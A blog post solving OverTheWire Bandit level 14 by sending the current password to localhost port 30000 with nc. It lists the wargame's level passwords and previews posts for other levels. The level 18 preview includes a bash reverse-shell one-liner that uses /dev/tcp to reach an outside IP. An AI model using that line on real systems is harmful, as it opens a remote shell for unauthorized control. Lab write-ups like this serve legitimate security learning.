Skip to main content

Bandit 14 Over The Wire

Lessons Learned:

Using nc to set up port connections

Logging in

On a kali vm/ linux machine
Type:

ssh bandit14@bandit.labs.overthewire.org -p 2220
4wcYUJFw0k0XLShlDzztnTBHiqxU3b3e

Completing The Challenge

The Goal:

The password for the next level can be retrieved by submitting the password of the current level to port 30000 on localhost.

The Solution:

bandit14@bandit:~$ nc localhost 30000

4wcYUJFw0k0XLShlDzztnTBHiqxU3b3e

Correct!

BfMYroe26WYalil77FoDi9qh59eK5xNr

 Hint:

 Make sure you log in directly, this cant be solved through the private key login.

Labels:

Comments

Post a Comment

Popular posts from this blog

Bandit 12 Over The Wire

Lessons Learned extracting and decompressing files using the following tools: file, xxd -r, gunzip, bunsip2, and tar -xf Logging in On a kali vm/ linux machine Type: ssh bandit12@bandit.labs.overthewire.org -p 2220  5Te8Y4drgCRfCx8ugdwuEX8KFC6k2EUu Completing The Challenge The Goal: The password for the next level is stored in the file data.txt , which is a hexdump of a file that has been repeatedly compressed. For this level it may be useful to create a directory under /tmp in which you can work using mkdir. For example: mkdir /tmp/myname123. Then copy the datafile using cp, and rename it using mv (read the manpages!) The Solution:      Revamped:         I decided to write a bash file that solves the problem.                    mkdir /tmp/a_name/                    mv data.txt /tmp/a_name      ...
Post a Comment
Read more

Bandit 11 Over The Wire

 Lessons Learned using cyberchef for things like rot13 Logging in On a kali vm/ linux machine Type: ssh bandit11@bandit.labs.overthewire.org -p 2220  IFukwKGsFW8MOq3IRFqrxE1hxTNEbUPR Completing The Challenge The Goal: The password for the next level is stored in the file data.txt , where all lowercase (a-z) and uppercase (A-Z) letters have been rotated by 13 positions The Solution: bandit11@bandit:~$ cat data.txt Gur cnffjbeq vf 5Gr8L4qetPEsPk8htqjhRK8XSP6x2RHh   The password is 5Te8Y4drgCRfCx8ugdwuEX8KFC6k2EUu This is known as rot13 and many free websites exist to solve this issue. CyberChef is a very good site/tool for this and can be downloaded
Post a Comment
Read more

Bandit 18 Over The Wire

Lessons Learned ssh actions for when bashrc has immediate logout, also has advice on some reverse shell one liners Logging in On a kali vm/ linux machine Type: ssh bandit18@bandit.labs.overthewire.org -p 2220 kfBf3eYk5BPBRzwjqutbbfE887SVc5Yd Completing The Challenge The Goal: The password for the next level is stored in a file readme in the homedirectory. Unfortunately, someone has modified .bashrc to log you out when you log in with SSH. The Solution: kali@kali:~$ ssh bandit18@bandit.labs.overthewire.org -p 2220 'cat ~/readme' This is a OverTheWire game server. More information on http://www.overthewire.org/wargames bandit18@bandit.labs.overthewire.org's password: IueksS7Ubh8G3DCwVzrTd8rAVOwq3M5x Ive made reverse shells by doing one liner tcp calls using stuff like the following in the single quotes and by mixing commands using like the following: bash -i > & /dev/tcp/10.0.0.1/8080 0 > & 1  
Post a Comment
Read more